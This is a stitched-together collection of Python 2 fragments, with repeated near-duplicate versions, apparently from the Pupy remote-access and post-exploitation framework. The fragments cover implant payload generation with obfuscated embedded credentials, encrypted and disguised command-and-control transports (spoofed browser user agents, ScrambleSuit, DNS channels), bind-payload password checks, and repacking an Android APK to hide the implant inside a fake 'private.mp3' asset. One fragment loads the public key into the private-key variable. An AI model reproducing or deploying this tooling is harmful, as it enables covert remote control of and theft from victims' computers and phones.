def __init__(self, *args, **kwargs):
self.ssl_auth = kwargs.pop('ssl_auth', True)
self.hostname = kwargs.pop('hostname', None)
if self.ssl_auth:
self.cert_reqs = ssl.CERT_REQUIRED
try:
import pupy_credentials
self.SSL_CLIENT_CERT = pupy_credentials.SSL_CLIENT_CERT
self.SSL_CLIENT_KEY = pupy_credentials.SSL_CLIENT_KEY
self.SSL_CA_CERT = pupy_credentials.SSL_CA_CERT
self.ROLE = 'CLIENT'
except:
from pupylib.PupyCredentials import Credentials
credentials = Credentials()
self.SSL_CLIENT_CERT = credentials['SSL_CLIENT_CERT']
self.SSL_CLIENT_KEY = credentials['SSL_CLIENT_KEY']
self.SSL_CA_CERT = credentials['SSL_CA_CERT']
self.ROLE = credentials.role
else:
self.cert_reqs = ssl.CERT_NONE
self.ciphers = 'HIGH:!aNULL:!MD5:!RC4:!3DES:!DES'
self.ssl_version = ssl.PROTOCOL_SSLv23
super(PupySSLClient, self).__init__(*args, **kwargs)
def main():
from pupylib.utils.term import hint_to_text
from traceback import print_exc
def display(data):
print hint_to_text(data)
Credentials.DEFAULT_ROLE = 'CLIENT'
config = PupyConfig()
Credentials(config=config, validate=True)
parser = get_parser(argparse.ArgumentParser, config)
try:
args = parser.parse_args()
pupygen(args, config, None, display)
except NoOutput:
sys.exit(0)
except InvalidOptions:
sys.exit(1)
except (ValueError, EncryptionError), e:
if args.debug:
print_exc()
display(Error(e))
def set(self, conf, link_ip, port, ssl, useTargetProxy):
self.payload_conf = conf
self.link_ip = link_ip
self.link_port = port
self.random_reflectivepeinj_name = ''.join([
random.choice(string.ascii_lowercase + string.ascii_uppercase +
string.digits)
for _ in range(0, random.randint(8, 12))
])
self.useTargetProxy = useTargetProxy
self.ssl = ssl
if self.ssl:
credentials = Credentials()
keystr = credentials['SSL_BIND_KEY']
certstr = credentials['SSL_BIND_CERT']
fd_cert_path, tmp_cert_path = tempfile.mkstemp()
fd_key_path, tmp_key_path = tempfile.mkstemp()
os.write(fd_cert_path, certstr)
os.close(fd_cert_path)
os.write(fd_key_path, keystr)
os.close(fd_key_path)
self.socket = wrap_socket(self.socket,
certfile=tmp_cert_path,
keyfile=tmp_key_path,
server_side=True)
self.tmp_cert_path = tmp_cert_path
self.tmp_key_path = tmp_key_path
def get_raw_conf(conf, obfuscate=False):
credentials = Credentials(role='client')
if not "offline_script" in conf:
offline_script = ""
else:
offline_script = conf["offline_script"]
obf_func = lambda x: x
if obfuscate:
obf_func = compress_encode_obfs
l = launchers[conf['launcher']]()
l.parse_args(conf['launcher_args'])
required_credentials = set(l.credentials) \
if hasattr(l, 'credentials') else set([])
transport = l.get_transport()
transports_list = []
if transport:
transports_list = [transport]
if transports[transport].credentials:
for name in transports[transport].credentials:
required_credentials.add(name)
elif not transport:
for n, t in transports.iteritems():
transports_list.append(n)
if t.credentials:
for name in t.credentials:
required_credentials.add(name)
print colorize("[+] ", "red") + 'Required credentials:\n{}'.format(
colorize("[+] ", "red") + ', '.join(required_credentials))
embedded_credentials = '\n'.join([
'{}={}'.format(credential, repr(credentials[credential])) \
for credential in required_credentials if credentials[credential] is not None
])+'\n'
config = '\n'.join([
'pupyimporter.pupy_add_package({})'.format(
repr(cPickle.dumps({'pupy_credentials.py':
embedded_credentials}))),
'\n'.join([
'pupyimporter.pupy_add_package({})'.format(
repr(
cPickle.dumps(
gen_package_pickled_dic(
ROOT + os.sep,
'network.transports.{}'.format(transport)))))
for transport in transports_list
]), 'import sys', 'sys.modules.pop("network.conf")',
'import network.conf', 'LAUNCHER={}'.format(repr(conf['launcher'])),
'LAUNCHER_ARGS={}'.format(repr(conf['launcher_args'])), offline_script
])
return obf_func(config)
def __init__(self, *args, **kwargs):
Transport.__init__(self, *args, **kwargs)
try:
import pupy_credentials
RSA_PUB_KEY = pupy_credentials.SIMPLE_RSA_PUB_KEY
RSA_PRIV_KEY = pupy_credentials.SIMPLE_RSA_PRIV_KEY
except ImportError:
from pupylib.PupyCredentials import Credentials
credentials = Credentials()
RSA_PUB_KEY = credentials['SIMPLE_RSA_PUB_KEY']
RSA_PRIV_KEY = credentials['SIMPLE_RSA_PRIV_KEY']
user_agent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
if self.launcher_type == LAUNCHER_TYPE_BIND:
self.client_transport = chain_transports(
PupyWebSocketClient.custom(user_agent=user_agent),
RSA_AESServer.custom(privkey=RSA_PRIV_KEY, rsa_key_size=4096, aes_size=256),
)
self.server_transport = chain_transports(
PupyWebSocketServer.custom(verify_user_agent=user_agent),
RSA_AESClient.custom(pubkey=RSA_PUB_KEY, rsa_key_size=4096, aes_size=256),
)
else:
self.client_transport = chain_transports(
PupyWebSocketClient.custom(user_agent=user_agent),
RSA_AESClient.custom(pubkey=RSA_PUB_KEY, rsa_key_size=4096, aes_size=256),
)
self.server_transport = chain_transports(
PupyWebSocketServer.custom(verify_user_agent=user_agent),
RSA_AESServer.custom(privkey=RSA_PRIV_KEY, rsa_key_size=4096, aes_size=256),
)
def ssl_authenticator():
keystr = b''
certstr = b''
client_cert_required = True
try:
import pupy_credentials
keystr = pupy_credentials.SSL_BIND_KEY
certstr = pupy_credentials.SSL_BIND_CERT
castr = pupy_credentials.SSL_CA_CERT
role = 'CLIENT'
except:
from pupylib.PupyConfig import PupyConfig
from pupylib.PupyCredentials import Credentials
config = PupyConfig()
credentials = Credentials()
client_cert_required = config.getboolean('ssl', 'client_cert_required')
keystr = credentials['SSL_BIND_KEY']
certstr = credentials['SSL_BIND_CERT']
castr = credentials['SSL_CA_CERT']
role = credentials.role
return PupySSLAuthenticator(role,
keystr,
certstr,
castr,
client_cert_required=client_cert_required)
def __init__(self, *args, **kwargs):
Transport.__init__(self, *args, **kwargs)
try:
import pupy_credentials
RSA_PUB_KEY = pupy_credentials.SIMPLE_RSA_PUB_KEY
RSA_PRIV_KEY = pupy_credentials.SIMPLE_RSA_PRIV_KEY
except ImportError:
from pupylib.PupyCredentials import Credentials
credentials = Credentials()
RSA_PUB_KEY = credentials['SIMPLE_RSA_PUB_KEY']
RSA_PRIV_KEY = credentials['SIMPLE_RSA_PRIV_KEY']
if self.launcher_type == LAUNCHER_TYPE_BIND:
self.client_transport = RSA_AESServer.custom(privkey=RSA_PRIV_KEY,
rsa_key_size=4096,
aes_size=256)
self.server_transport = RSA_AESClient.custom(pubkey=RSA_PUB_KEY,
rsa_key_size=4096,
aes_size=256)
else:
self.client_transport = RSA_AESClient.custom(pubkey=RSA_PUB_KEY,
rsa_key_size=4096,
aes_size=256)
self.server_transport = RSA_AESServer.custom(privkey=RSA_PRIV_KEY,
rsa_key_size=4096,
aes_size=256)
def set(self, conf, sslEnabled, stage1, stage2_x86, stage2_x64):
self.payload_conf = conf
self.stage1 = stage1
self.stage2_x86 = stage2_x86
self.stage2_x64 = stage2_x64
if sslEnabled:
credentials = Credentials()
keystr = credentials['SSL_BIND_KEY']
certstr = credentials['SSL_BIND_CERT']
fd_cert_path, tmp_cert_path = tempfile.mkstemp()
fd_key_path, tmp_key_path = tempfile.mkstemp()
os.write(fd_cert_path, certstr)
os.close(fd_cert_path)
os.write(fd_key_path, keystr)
os.close(fd_key_path)
self.socket = wrap_socket(self.socket,
certfile=tmp_cert_path,
keyfile=tmp_key_path,
server_side=True,
ssl_version=ssl.PROTOCOL_TLSv1)
self.tmp_cert_path = tmp_cert_path
self.tmp_key_path = tmp_key_path
def on_connect(self):
pupy.dprint('Bind service: on_connect called')
try:
from pupy_credentials import BIND_PAYLOADS_PASSWORD
password = BIND_PAYLOADS_PASSWORD
pupy.dprint('Expected password: {}', repr(password))
except ImportError:
from pupylib.PupyCredentials import Credentials
credentials = Credentials()
password = credentials['BIND_PAYLOADS_PASSWORD']
pupy.dprint('Expected password: {} (fallback)', repr(password))
remote_password = self._conn.root.get_password()
pupy.dprint('Remote password: {}', remote_password)
if remote_password != password:
self._conn.close()
raise KeyboardInterrupt("wrong password")
super(BindSlaveService, self).on_connect()
def __init__(self, *args, **kwargs):
Transport.__init__(self, *args, **kwargs)
try:
import pupy_credentials
RSA_PUB_KEY = pupy_credentials.SIMPLE_RSA_PUB_KEY
RSA_PRIV_KEY = pupy_credentials.SIMPLE_RSA_PRIV_KEY
SCRAMBLESUIT_PASSWD = pupy_credentials.SCRAMBLESUIT_PASSWD
except ImportError:
from pupylib.PupyCredentials import Credentials
credentials = Credentials()
RSA_PUB_KEY = credentials['SIMPLE_RSA_PUB_KEY']
RSA_PRIV_KEY = credentials['SIMPLE_RSA_PRIV_KEY']
SCRAMBLESUIT_PASSWD = credentials['SCRAMBLESUIT_PASSWD']
self.client_transport_kwargs.update({
'host':
None,
'path':
'/ws/' + ''.join(md5(SCRAMBLESUIT_PASSWD).hexdigest()[:8]),
'user-agent':
DEFAULT_USER_AGENT
})
self.server_transport_kwargs.update({
'path':
'/ws/' + ''.join(md5(SCRAMBLESUIT_PASSWD).hexdigest()[:8]),
'user-agent':
DEFAULT_USER_AGENT
})
if self.launcher_type == LAUNCHER_TYPE_BIND:
self.client_transport = chain_transports(
PupyWebSocketClient,
RSA_AESServer.custom(privkey=RSA_PRIV_KEY,
rsa_key_size=4096,
aes_size=256),
)
self.server_transport = chain_transports(
PupyWebSocketServer,
RSA_AESClient.custom(pubkey=RSA_PUB_KEY,
rsa_key_size=4096,
aes_size=256),
)
else:
self.client_transport = chain_transports(
PupyWebSocketClient,
RSA_AESClient.custom(pubkey=RSA_PUB_KEY,
rsa_key_size=4096,
aes_size=256),
)
self.server_transport = chain_transports(
PupyWebSocketServer,
RSA_AESServer.custom(privkey=RSA_PRIV_KEY,
rsa_key_size=4096,
aes_size=256),
)
def on_connect(self):
try:
from pupy_credentials import BIND_PAYLOADS_PASSWORD
password = BIND_PAYLOADS_PASSWORD
except ImportError:
from pupylib.PupyCredentials import Credentials
credentials = Credentials()
password = credentials['BIND_PAYLOADS_PASSWORD']
if self._conn.root.get_password() != password:
self._conn.close()
raise KeyboardInterrupt("wrong password")
super(BindSlaveService, self).on_connect()
def get_edit_apk(display, path, conf, compressed_config=None, debug=False):
credentials = Credentials(role='control')
priv_key = credentials['APK_PRIV_KEY']
pub_key = credentials['APK_PUB_KEY']
if not priv_key or not pub_key:
raise ValueError(
'CONTROL_APK_PRIV_KEY/CONTROL_APK_PUB_KEY credentials missing (old credentials)'
)
tempdir = tempfile.mkdtemp(prefix="tmp_pupy_")
fd, tempapk = tempfile.mkstemp(prefix="tmp_pupy_")
try:
packed_payload = pack_py_payload(display, get_raw_conf(display, conf),
debug, False)
shutil.copy(path, tempapk)
#extracting the python-for-android install tar from the apk
zf = zipfile.ZipFile(path, 'r')
zf.extract("assets/private.mp3", tempdir)
zf.close()
with open(os.path.join(tempdir, "pp.py"), 'w') as w:
w.write(packed_payload)
import py_compile
py_compile.compile(os.path.join(tempdir, "pp.py"),
os.path.join(tempdir, "pp.pyo"))
display(Success('Packaging the apk ... (can take 10-20 seconds)'))
#updating the tar with the new config
updateTar(os.path.join(tempdir, "assets/private.mp3"), "pp.pyo",
os.path.join(tempdir, "pp.pyo"))
#repacking the tar in the apk
with open(os.path.join(tempdir, "assets/private.mp3"), 'r') as t:
updateZip(tempapk, "assets/private.mp3", t.read())
# signing the tar
result = BytesIO()
jarsigner(priv_key, pub_key, tempapk, result)
return result.getvalue()
finally:
#cleaning up
shutil.rmtree(tempdir, ignore_errors=True)
os.unlink(tempapk)
def __init__(self, domain):
self.stream = None
self.commands = []
self.lock = Lock()
self.new_commands = Event()
try:
from pupy_credentials import DNSCNC_PUB_KEY
key = DNSCNC_PUB_KEY
except:
from pupylib.PupyCredentials import Credentials
credentials = Credentials()
key = credentials['DNSCNC_PUB_KEY']
DnsCommandsClient.__init__(self, domain, key=key)
def __init__(self, domain, ns=None, qtype='A', ns_timeout=3):
self.stream = None
self.commands = []
self.lock = Lock()
self.new_commands = Event()
try:
import pupy_credentials
key = pupy_credentials.DNSCNC_PUB_KEY_V2
except ImportError:
from pupylib.PupyCredentials import Credentials
credentials = Credentials()
key = credentials['DNSCNC_PUB_KEY_V2']
DnsCommandsClient.__init__(self, domain, key, ns, qtype, ns_timeout=ns_timeout)
def __init__(self, *args, **kwargs):
Transport.__init__(self, *args, **kwargs)
self.client_transport_kwargs.update({'host': None})
try:
import pupy_credentials
RSA_PUB_KEY = pupy_credentials.SIMPLE_RSA_PUB_KEY
RSA_PRIV_KEY = pupy_credentials.SIMPLE_RSA_PRIV_KEY
except ImportError:
from pupylib.PupyCredentials import Credentials
credentials = Credentials()
RSA_PUB_KEY = credentials['SIMPLE_RSA_PUB_KEY']
RSA_PRIV_KEY = credentials['SIMPLE_RSA_PRIV_KEY']
user_agent = 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) '\
'Chrome/41.0.2228.0 Safari/537.36'
if self.launcher_type == LAUNCHER_TYPE_BIND:
self.client_transport = chain_transports(
PupyHTTPClient.custom(keep_alive=True, user_agent=user_agent),
RSA_AESServer.custom(privkey=RSA_PRIV_KEY,
rsa_key_size=4096,
aes_size=256),
)
self.server_transport = chain_transports(
PupyHTTPServer.custom(verify_user_agent=user_agent),
RSA_AESClient.custom(pubkey=RSA_PUB_KEY,
rsa_key_size=4096,
aes_size=256),
)
else:
self.client_transport = chain_transports(
PupyHTTPClient.custom(keep_alive=True, user_agent=user_agent),
RSA_AESClient.custom(pubkey=RSA_PUB_KEY,
rsa_key_size=4096,
aes_size=256),
)
self.server_transport = chain_transports(
PupyHTTPServer.custom(verify_user_agent=user_agent),
RSA_AESServer.custom(privkey=RSA_PRIV_KEY,
rsa_key_size=4096,
aes_size=256),
)
def on_connect(self):
self.exposed_namespace = {}
self.exposed_cleanups = []
self._conn._config.update(REVERSE_SLAVE_CONF)
import pupy
try:
from pupy_credentials import BIND_PAYLOADS_PASSWORD
password = BIND_PAYLOADS_PASSWORD
except:
from pupylib.PupyCredentials import Credentials
credentials = Credentials()
password = credentials['BIND_PAYLOADS_PASSWORD']
if self._conn.root.get_password() != password:
self._conn.close()
raise KeyboardInterrupt("wrong password")
pupy.namespace = UpdatableModuleNamespace(self.exposed_getmodule)
self._conn.root.set_modules(pupy.namespace)
def __init__(self, *args, **kwargs):
Transport.__init__(self, *args, **kwargs)
try:
import pupy_credentials
PUB_KEY = pupy_credentials.ECPV_RC4_PUBLIC_KEY
PRIV_KEY = pupy_credentials.ECPV_RC4_PRIVATE_KEY
except ImportError:
from pupylib.PupyCredentials import Credentials
credentials = Credentials()
PUB_KEY = credentials['ECPV_RC4_PUBLIC_KEY']
PRIV_KEY = credentials['ECPV_RC4_PRIVATE_KEY']
if self.launcher_type == LAUNCHER_TYPE_BIND:
self.client_transport = EC4TransportServer.custom(privkey=PRIV_KEY)
self.server_transport = EC4TransportClient.custom(pubkey=PUB_KEY)
else:
self.server_transport = EC4TransportServer.custom(privkey=PRIV_KEY)
self.client_transport = EC4TransportClient.custom(pubkey=PUB_KEY)
def __init__(self, *args, **kwargs):
Transport.__init__(self, *args, **kwargs)
try:
import pupy_credentials
RSA_PUB_KEY = pupy_credentials.SIMPLE_RSA_PUB_KEY
RSA_PRIV_KEY = pupy_credentials.SIMPLE_RSA_PUB_KEY
SCRAMBLESUIT_PASSWD = pupy_credentials.SCRAMBLESUIT_PASSWD
except ImportError:
from pupylib.PupyCredentials import Credentials
credentials = Credentials()
RSA_PUB_KEY = credentials['SIMPLE_RSA_PUB_KEY']
RSA_PRIV_KEY = credentials['SIMPLE_RSA_PRIV_KEY']
SCRAMBLESUIT_PASSWD = credentials['SCRAMBLESUIT_PASSWD']
self.client_transport_kwargs = {'password': SCRAMBLESUIT_PASSWD}
self.server_transport_kwargs = {'password': SCRAMBLESUIT_PASSWD}
if self.launcher_type == LAUNCHER_TYPE_BIND:
self.client_transport = chain_transports(
ScrambleSuitClient,
RSA_AESServer.custom(privkey=RSA_PRIV_KEY,
rsa_key_size=4096,
aes_size=256))
self.server_transport = chain_transports(
ScrambleSuitServer,
RSA_AESClient.custom(pubkey=RSA_PUB_KEY,
rsa_key_size=4096,
aes_size=256))
else:
self.client_transport = chain_transports(
ScrambleSuitClient,
RSA_AESClient.custom(pubkey=RSA_PUB_KEY,
rsa_key_size=4096,
aes_size=256))
self.server_transport = chain_transports(
ScrambleSuitServer,
RSA_AESServer.custom(privkey=RSA_PRIV_KEY,
rsa_key_size=4096,
aes_size=256))
def __init__(self, *args, **kwargs):
try:
import pupy_credentials
self.SSL_CLIENT_CERT = pupy_credentials.SSL_CLIENT_CERT
self.SSL_CLIENT_KEY = pupy_credentials.SSL_CLIENT_KEY
self.SSL_CA_CERT = pupy_credentials.SSL_CA_CERT
self.ROLE = 'CLIENT'
except:
from pupylib.PupyCredentials import Credentials
credentials = Credentials()
self.SSL_CLIENT_CERT = credentials['SSL_CLIENT_CERT']
self.SSL_CLIENT_KEY = credentials['SSL_CLIENT_KEY']
self.SSL_CA_CERT = credentials['SSL_CA_CERT']
self.ROLE = credentials.role
self.ciphers = 'HIGH:!aNULL:!MD5:!RC4:!3DES:!DES:!AES128@STRENGTH'
self.cert_reqs = ssl.CERT_REQUIRED
self.ssl_version = ssl.PROTOCOL_SSLv23 #alias for PROTOCOL_TLS for recent versions of python but works with older version missing TLS
super(PupySSLClient, self).__init__(*args, **kwargs)
def __init__(self, *args, **kwargs):
try:
import pupy_credentials
self.SSL_CLIENT_CERT = pupy_credentials.SSL_CLIENT_CERT
self.SSL_CLIENT_KEY = pupy_credentials.SSL_CLIENT_KEY
self.SSL_CA_CERT = pupy_credentials.SSL_CA_CERT
self.ROLE = 'CLIENT'
except:
from pupylib.PupyCredentials import Credentials
credentials = Credentials()
self.SSL_CLIENT_CERT = credentials['SSL_CLIENT_CERT']
self.SSL_CLIENT_KEY = credentials['SSL_CLIENT_KEY']
self.SSL_CA_CERT = credentials['SSL_CA_CERT']
self.ROLE = credentials.role
self.ciphers = 'SHA256+AES256:SHA1+AES256:@STRENGTH'
self.cert_reqs = ssl.CERT_REQUIRED
self.ssl_version = ssl.PROTOCOL_TLSv1
super(PupySSLClient, self).__init__(*args, **kwargs)
def ssl_authenticator():
keystr = b''
certstr = b''
server_side = True
try:
import pupy_credentials
assert(pupy_credentials)
server_side = False
except ImportError:
from pupylib.PupyCredentials import Credentials
credentials = Credentials()
keystr = credentials['SSL_BIND_KEY']
certstr = credentials['SSL_BIND_CERT']
castr = credentials['SSL_CA_CERT']
role = credentials.role
return DummySSLAuthenticator(
role, keystr, certstr, castr, server_side
)
def exposed_get_password(self):
credentials = Credentials()
return credentials['BIND_PAYLOADS_PASSWORD']
def get_raw_conf(display, conf, verbose=False):
credentials = Credentials(role='client')
if 'offline_script' not in conf:
offline_script = ''
else:
offline_script = conf['offline_script']
launcher = launchers[conf['launcher']]()
launcher.parse_args(conf['launcher_args'])
required_credentials = set(launcher.credentials) \
if hasattr(launcher, 'credentials') else set([])
transport = launcher.transport
transports_list = []
if transport:
transports_list = [transport]
if transports[transport].credentials:
for name in transports[transport].credentials:
required_credentials.add(name)
elif not transport:
for n, t in transports.iteritems():
transports_list.append(n)
if t.credentials:
for name in t.credentials:
required_credentials.add(name)
available = []
not_available = []
for cred in required_credentials:
if credentials[cred]:
available.append(cred)
else:
not_available.append(cred)
display(
List(available,
bullet=Color('+', 'green'),
caption=Success('Required credentials (found)')))
if not_available:
display(
List(not_available,
bullet=Color('-', 'red'),
caption=Error('Required credentials (not found)')))
embedded_credentials = {
credential: credentials[credential]
for credential in required_credentials
if credentials[credential] is not None
}
if verbose:
config_table = [{
'KEY':
k,
'VALUE':
'PRESENT' if (k in ('offline_script') and v) else
(unicode(v) if type(v) not in (tuple, list, set) else ' '.join(
unicode(x) for x in v))
} for k, v in conf.iteritems() if v]
display(
Table(config_table, ['KEY', 'VALUE'],
Color('Configuration', 'yellow'),
vspace=1))
config = {
'credentials': embedded_credentials,
'scriptlets': [offline_script] or [],
'debug': conf.get('debug', False),
'launcher': conf['launcher'],
'launcher_args': conf['launcher_args'],
'cid': conf.get('cid', 0x31338),
'delays': conf.get('delays', [(10, 5, 10), (50, 30, 50),
(-1, 150, 300)])
}
return config
def get_raw_conf(display, conf, obfuscate=False, verbose=False):
credentials = Credentials(role='client')
if "offline_script" not in conf:
offline_script=""
else:
offline_script=conf["offline_script"]
launcher = launchers[conf['launcher']]()
launcher.parse_args(conf['launcher_args'])
required_credentials = set(launcher.credentials) \
if hasattr(launcher, 'credentials') else set([])
transport = launcher.get_transport()
transports_list = []
if transport:
transports_list = [transport]
if transports[transport].credentials:
for name in transports[transport].credentials:
required_credentials.add(name)
elif not transport:
for n, t in transports.iteritems():
transports_list.append(n)
if t.credentials:
for name in t.credentials:
required_credentials.add(name)
available = []
not_available = []
for cred in required_credentials:
if credentials[cred]:
available.append(cred)
else:
not_available.append(cred)
display(
List(available, bullet=Color('+', 'green'),
caption=Success('Required credentials (found)')))
if not_available:
display(
List(not_available, bullet=Color('-', 'red'),
caption=Error('Required credentials (not found)')))
embedded_credentials = '\n'.join([
'{}={}'.format(credential, repr(credentials[credential])) \
for credential in required_credentials if credentials[credential] is not None
])+'\n'
if verbose:
config_table = [{
'KEY': k, 'VALUE': 'PRESENT' if (k in ('offline_script') and v) else (
unicode(v) if type(v) not in (tuple,list,set) else ' '.join(
unicode(x) for x in v))
} for k,v in conf.iteritems() if v]
display(Table(config_table, ['KEY', 'VALUE'], Color('Configuration', 'yellow'), vspace=1))
config = '\n'.join([
'pupyimporter.pupy_add_package({})'.format(
repr(cPickle.dumps({
'pupy_credentials.pye':
bytes(pupycompile(embedded_credentials, obfuscate=True))
}))),
dependencies.importer(set(
'network.transports.{}'.format(transport) for transport in transports_list
), path=ROOT),
'import sys',
'sys.modules.pop("network.conf", "")',
'import network.conf',
'LAUNCHER={}'.format(repr(conf['launcher'])),
'LAUNCHER_ARGS={}'.format(repr(conf['launcher_args'])),
'CONFIGURATION_CID={}'.format(conf.get('cid', 0x31338)),
'DELAYS={}'.format(repr(conf.get('delays', [
(10, 5, 10), (50, 30, 50), (-1, 150, 300)]))),
'pupy.cid = CONFIGURATION_CID',
'debug={}'.format(bool(conf.get('debug', False))),
'SCRIPTLETS={}'.format(repr(offline_script) if offline_script else '""')
])
return compress_encode_obfs(config) if obfuscate else config
def get_raw_conf(conf, obfuscate=False, verbose=False):
credentials = Credentials(role='client')
if not "offline_script" in conf:
offline_script=""
else:
offline_script=conf["offline_script"]
obf_func=lambda x:x
if obfuscate:
obf_func=compress_encode_obfs
launcher = launchers[conf['launcher']]()
launcher.parse_args(conf['launcher_args'])
required_credentials = set(launcher.credentials) \
if hasattr(launcher, 'credentials') else set([])
transport = launcher.get_transport()
transports_list = []
if transport:
transports_list = [ transport ]
if transports[transport].credentials:
for name in transports[transport].credentials:
required_credentials.add(name)
elif not transport:
for n, t in transports.iteritems():
transports_list.append(n)
if t.credentials:
for name in t.credentials:
required_credentials.add(name)
available = []
not_available = []
for cred in required_credentials:
if credentials[cred]:
available.append(cred)
else:
not_available.append(cred)
print colorize("[+] ", "green") + 'Required credentials (found):\n{}'.format(
colorize("[+] ", "green") + ', '.join(available))
if not_available:
print colorize("[-] ", "red") + 'Required credentials (not found):\n{}'.format(
colorize("[-] ", "red") + ', '.join(not_available))
embedded_credentials = '\n'.join([
'{}={}'.format(credential, repr(credentials[credential])) \
for credential in required_credentials if credentials[credential] is not None
])+'\n'
if verbose:
for k, v in conf.iteritems():
if k in ('offline_script'):
continue
print colorize("[C] {}: {}".format(k, v), "yellow")
config = '\n'.join([
'pupyimporter.pupy_add_package({})'.format(
repr(cPickle.dumps({
'pupy_credentials.pye' :
bytes(pupycompile(embedded_credentials, obfuscate=True))
}))),
dependencies.importer(set(
'network.transports.{}'.format(transport) for transport in transports_list
), path=ROOT),
'import sys',
'sys.modules.pop("network.conf")',
'import network.conf',
'LAUNCHER={}'.format(repr(conf['launcher'])),
'LAUNCHER_ARGS={}'.format(repr(conf['launcher_args'])),
'CONFIGURATION_CID={}'.format(conf.get('cid', 0x31338)),
'pupy.cid = CONFIGURATION_CID',
'debug={}'.format(bool(conf.get('debug', False))),
offline_script
])
return obf_func(config)
display(Success('SCRIPTLETS: {}'.format(args.scriptlet)))
display(Success('DEBUG: {}'.format(args.debug)))
return os.path.abspath(outpath)
if __name__ == '__main__':
from pupylib.utils.term import hint_to_text
from traceback import print_exc
def display(data):
print hint_to_text(data)
Credentials.DEFAULT_ROLE = 'CLIENT'
config = PupyConfig()
Credentials(config=config, validate=True)
parser = get_parser(argparse.ArgumentParser, config)
try:
args = parser.parse_args()
pupygen(args, config, display)
except NoOutput:
sys.exit(0)
except InvalidOptions:
sys.exit(1)
except (ValueError, EncryptionError), e:
if args.debug:
print_exc()